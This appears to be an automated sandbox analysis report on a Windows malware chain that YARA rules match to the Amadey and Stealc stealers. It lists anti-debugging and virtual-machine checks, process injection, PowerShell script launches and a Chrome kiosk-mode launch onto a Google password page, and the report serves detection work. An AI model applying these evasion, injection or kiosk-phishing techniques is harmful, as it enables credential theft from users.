Source: skotes.exe, 00000008.00000002.2697000883.0000000001418000.00000004.00000020.00020000.00000000.sdmp, 8a145ab7b3.exe, 0000000A.00000002.2065676534.0000000001A13000.00000004.00000020.00020000.00000000.sdmp, 8a145ab7b3.exe, 0000000A.00000002.2065676534.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, cee706a53f.exe, 0000000B.00000002.2115108597.0000000001325000.00000004.00000020.00020000.00000000.sdmp, cee706a53f.exe, 0000000B.00000002.2115108597.0000000001355000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: cee706a53f.exe, 0000000B.00000002.2115108597.00000000012DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: powershell.exe, 0000000C.00000002.2099154519.0000000007669000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: skotes.exe, 00000008.00000002.2697000883.00000000013E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000002.1475884857.000000000082B000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1508487739.0000000000F7B000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1516199007.0000000000F7B000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000008.00000002.2690214730.0000000000F7B000.00000040.00000001.01000000.00000007.sdmp, 8a145ab7b3.exe, 0000000A.00000002.2064717193.0000000001168000.00000040.00000001.01000000.00000009.sdmp, cee706a53f.exe, 0000000B.00000002.2112264717.0000000000B38000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000026002\cee706a53f.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000026002\cee706a53f.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A30197 Start: 04A30280 End: 04A30223 0_2_04A30197
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: regmonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: gbdyllo
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: ollydbg
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: filemonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: NTICE
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: SICE
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Process queried: DebugPort
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort
Source: C:\Users\user\1000026002\cee706a53f.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A306C1 rdtsc 0_2_04A306C1
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DB652B mov eax, dword ptr fs:[00000030h] 8_2_00DB652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DBA302 mov eax, dword ptr fs:[00000030h] 8_2_00DBA302
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 8a145ab7b3.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cee706a53f.exe PID: 2100, type: MEMORYSTR
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D870A0 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree, 8_2_00D870A0
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Memory written: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe "C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000026002\cee706a53f.exe "C:\Users\user\1000026002\cee706a53f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000032042\ko.ps1" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000033142\so.ps1" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data
Source: 8a145ab7b3.exe, 8a145ab7b3.exe, 0000000A.00000002.2064717193.0000000001168000.00000040.00000001.01000000.00000009.sdmp, cee706a53f.exe, cee706a53f.exe, 0000000B.00000002.2112264717.0000000000B38000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe Binary or memory string: BProgram Manager
Source: skotes.exe, skotes.exe, 00000008.00000002.2690214730.0000000000F7B000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D9D3E2 cpuid 8_2_00D9D3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000026002\cee706a53f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000026002\cee706a53f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000032042\ko.ps1 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000033142\so.ps1 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000026002\cee706a53f.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000026002\cee706a53f.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D9CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 8_2_00D9CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D865E0 LookupAccountNameA, 8_2_00D865E0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 8.2.skotes.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.1924584689.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1435177507.0000000004820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1516020745.0000000000D81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1508409621.0000000000D81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1466599045.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2689728231.0000000000D81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1474161213.0000000004E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1475811914.0000000000631000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 24.2.8a145ab7b3.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.cee706a53f.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.8a145ab7b3.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.cee706a53f.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.8a145ab7b3.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cee706a53f.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.2062372153.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2541355264.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2330683116.0000000005660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2156402720.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2023916641.00000000054E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2065676534.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2199902950.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2336894310.0000000000751000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2064455494.0000000000D81000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2501696781.0000000000F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2243981246.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2247836152.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2428473626.000000000177B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2244884023.0000000000D81000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2338351590.000000000121B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2413577862.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2426500171.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2115108597.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2500617596.0000000000751000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2539828537.0000000000D81000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2111985097.0000000000751000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8a145ab7b3.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cee706a53f.exe PID: 2100, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 24.2.8a145ab7b3.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.cee706a53f.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.8a145ab7b3.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.cee706a53f.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.8a145ab7b3.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cee706a53f.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.2062372153.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2541355264.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2330683116.0000000005660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2156402720.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2023916641.00000000054E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2065676534.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2199902950.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2336894310.0000000000751000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2064455494.0000000000D81000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2501696781.0000000000F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2243981246.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2247836152.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2428473626.000000000177B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2244884023.0000000000D81000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2338351590.000000000121B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2413577862.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2426500171.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2115108597.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2500617596.0000000000751000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2539828537.0000000000D81000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2111985097.0000000000751000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8a145ab7b3.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cee706a53f.exe PID: 2100, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
